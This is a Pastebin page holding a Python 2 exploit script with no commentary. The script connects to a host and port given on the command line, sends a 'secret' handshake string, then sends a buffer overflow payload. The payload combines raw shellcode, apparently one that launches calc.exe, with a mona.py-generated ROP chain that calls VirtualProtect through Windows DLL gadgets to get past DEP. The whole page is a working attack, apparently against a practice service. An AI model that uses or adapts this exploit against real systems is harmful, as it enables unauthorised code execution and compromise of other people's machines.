Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import socket, sys, struct
- # bp 40190c recv
- # bp 401912 after recv
- def create_rop_chain():
- # rop chain generated with mona.py - www.corelan.be
- rop_gadgets = [
- 0x777d83e4, # POP EAX # RETN [RPCRT4.dll]
- 0x779f3030, # ptr to &VirtualProtect() [IAT bcryptPrimitives.dll]
- 0x7776f046, # MOV EAX,DWORD PTR DS:[EAX] # RETN [RPCRT4.dll]
- 0x76073a50, # XCHG EAX,ESI # RETN [KERNELBASE.dll]
- 0x77b646a5, # POP EBP # RETN [ntdll.dll]
- 0x760b9ef3, # & jmp esp [KERNELBASE.dll]
- 0x77bde810, # POP EBX # RETN [ntdll.dll]
- 0x000004B0, # 0x000004B0-> ebx
- 0x77b628ac, # POP EDX # RETN [ntdll.dll]
- 0x00000040, # 0x00000040-> edx
- 0x77bcd8ad, # POP ECX # RETN [ntdll.dll]
- 0x76120532, # &Writable location [KERNELBASE.dll]
- 0x743bb3b2, # POP EDI # RETN [SspiCli.dll]
- 0x77132d41, # RETN (ROP NOP) [KERNEL32.DLL]
- 0x7606d63c, # POP EAX # RETN [KERNELBASE.dll]
- 0x90909090, # nop
- 0x761ff729, # PUSHAD # RETN [sechost.dll]
- 0x760b9ef3,
- ]
- return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
- # edi rop nop
- # esi virtualprotect
- # ebp jmp esp
- # esp lpAddress
- # ebx dwSize
- # edx flNewProtect
- # ecx lpflOldProtect
- # eax 90909090
- shellcode="\xE8\x00\x00\x00\x00\x5A\x8D\x52\xFB\x89\xE5\x81\xEC\x00\x10\x00\x00\x52\xBB\x8E\xFE\x1F\x4B\xE8\x28\x00\x00\x00\x5A\x55\x52\x89\xC5\x8D\xB2\xE1\x00\x00\x00\x8D\xBA\xE9\x00\x00\x00\xE8\x48\x00\x00\x00\x5A\x5D\x31\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x54\xFF\xD0\xFC\x31\xFF\x64\x8B\x3D\x30\x00\x00\x00\x8B\x7F\x0C\x8B\x7F\x14\x8B\x77\x28\x31\xD2\x66\xAD\x84\xC0\x74\x11\x3C\x41\x72\x06\x3C\x5A\x77\x02\x0C\x20\xC1\xC2\x07\x30\xC2\xEB\xE9\x39\xDA\x8B\x47\x10\x8B\x3F\x75\xDB\xC3\x89\xEA\x03\x52\x3C\x8B\x52\x78\x01\xEA\x8B\x5A\x20\x01\xEB\x31\xC9\x57\x56\x8B\x36\x31\xC9\x8B\x3B\x01\xEF\x52\x31\xD2\xC1\xC2\x07\x32\x17\x47\x80\x3F\x00\x75\xF5\x92\x5A\x39\xF0\x74\x0C\x83\xC3\x04\x41\x39\x4A\x18\x75\xDF\x5E\x5F\xC3\x5E\x5F\xAD\x56\x53\x89\xEB\x89\xDE\x03\x5A\x24\x8D\x04\x4B\x0F\xB7\x00\x8D\x04\x86\x03\x42\x1C\x8B\x00\x01\xF0\xAB\x5B\x5E\x83\xC3\x04\x41\x81\x3E\xFF\xFF\x00\x00\x75\xAB\xC3\xAD\x6D\xBF\xE8\xFF\xFF\x00\x00\x01\x00\x00\x00";
- if len(sys.argv) != 3:
- print "supply IP PORT"
- sys.exit(-1)
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect( (sys.argv[1], int(sys.argv[2])) )
- ###send
- message = "secret\n\x00"
- sock.sendall(message)
- ###recieve
- data = sock.recv(10000)
- print data
- ###send
- rop_chain = create_rop_chain()
- #breakpoint="\xcc"
- ret_addr_s=struct.pack('L', 0x746b5b5b)
- pad="B"*400
- nops_len = 1040 - len(shellcode)
- exploit = "A" * nops_len
- exploit += shellcode
- exploit += rop_chain
- #print("NOPS=%d, shellcode=%d, rop=%d, ret_addr=%s\n" % (nops_len, len(shellcode), len(pad), ret_addr_s ) )
- print("Sending %d bytes" %(len(exploit)))
- sock.sendall(exploit)
- ###recieve
- data = sock.recv(10000)
- print data
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement